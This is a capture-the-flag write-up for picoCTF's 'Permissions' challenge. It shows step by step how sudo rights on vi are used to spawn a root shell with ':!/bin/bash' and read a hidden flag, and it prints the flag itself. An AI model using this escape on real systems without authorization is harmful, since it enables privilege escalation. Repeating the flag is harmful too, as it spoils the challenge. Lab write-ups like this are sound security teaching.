picoCTF 'Permissions' Write Up
Enumeration
Let’s start our instance and log in!
Command: ssh -p 51767 picoplayer@saturn.picoctf.net
Password: NBD+zO8s4y
We can start by figuring out what files we have in our user folder.
picoplayer@challenge:~$ ls
picoplayer@challenge:~$ ll
total 12
drwxr-xr-x 1 picoplayer picoplayer 20 Sep 29 20:44 ./
drwxr-xr-x 1 root root 24 Aug 4 2023 ../
-rw-r--r-- 1 picoplayer picoplayer 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 picoplayer picoplayer 3771 Feb 25 2020 .bashrc
drwx------ 2 picoplayer picoplayer 34 Sep 29 20:44 .cache/
-rw-r--r-- 1 picoplayer picoplayer 807 Feb 25 2020 .profile
Looks like there’s nothing that can help us. The challenge description wants us to find something in the root folder. Let’s check there.
picoplayer@challenge:~$ cd /root
-bash: cd: /root: Permission denied
picoplayer@challenge:~$ ll /root
ls: cannot open directory '/root': Permission denied
Nothing that can help us here. We need to figure out what root permissions we have in order to gain access to the root folder. We can do this by using sudo -l
to list all possible commands that we have superuser access for.
picoplayer@challenge:~$ sudo -l
[sudo] password for picoplayer:
Matching Defaults entries for picoplayer on challenge:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User picoplayer may run the following commands on challenge:
(ALL) /usr/bin/vi
Bingo! We have access to vim, and we can use that program to gain access to the root folder.
Root Access
Let’s start by using vim to give us a basic root shell. The command mode in vim allows us to run any Linux command as root, including /bin/bash
.
Start vim by using sudo /usr/bin/vi
.
Enter :!/bin/bash
. The :!
allows us to type in any Linux command. /bin/bash
is the Linux command we want to run.
~
~
~ VIM - Vi IMproved
~
~ version 8.1.3741
~ by Bram Moolenaar et al.
~ Modified by team+vim@tracker.debian.org
~ Vim is open source and freely distributable
~
~ Help poor children in Uganda!
~ type :help iccf<Enter> for information
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version8<Enter> for version info
~
~
~
:!/bin/bash
Press enter, and it should take you back to your original terminal screen.
picoplayer@challenge:~$ sudo /usr/bin/vi
[sudo] password for picoplayer:
root@challenge:/home/picoplayer#
From here, let’s go to the root directory and see what we have!
root@challenge:/home/picoplayer# cd /root
root@challenge:~# ll
total 12
drwx------ 1 root root 23 Aug 4 2023 ./
drwxr-xr-x 1 root root 51 Sep 29 20:57 ../
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 35 Aug 4 2023 .flag.txt
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
That .flag.txt
file looks very enticing. Let’s print out its contents.
root@challenge:~# cat .flag.txt
picoCTF{uS1ng_v1m_3dit0r_1cee9dcb}
We found our flag!
picoCTF{uS1ng_v1m_3dit0r_1cee9dcb}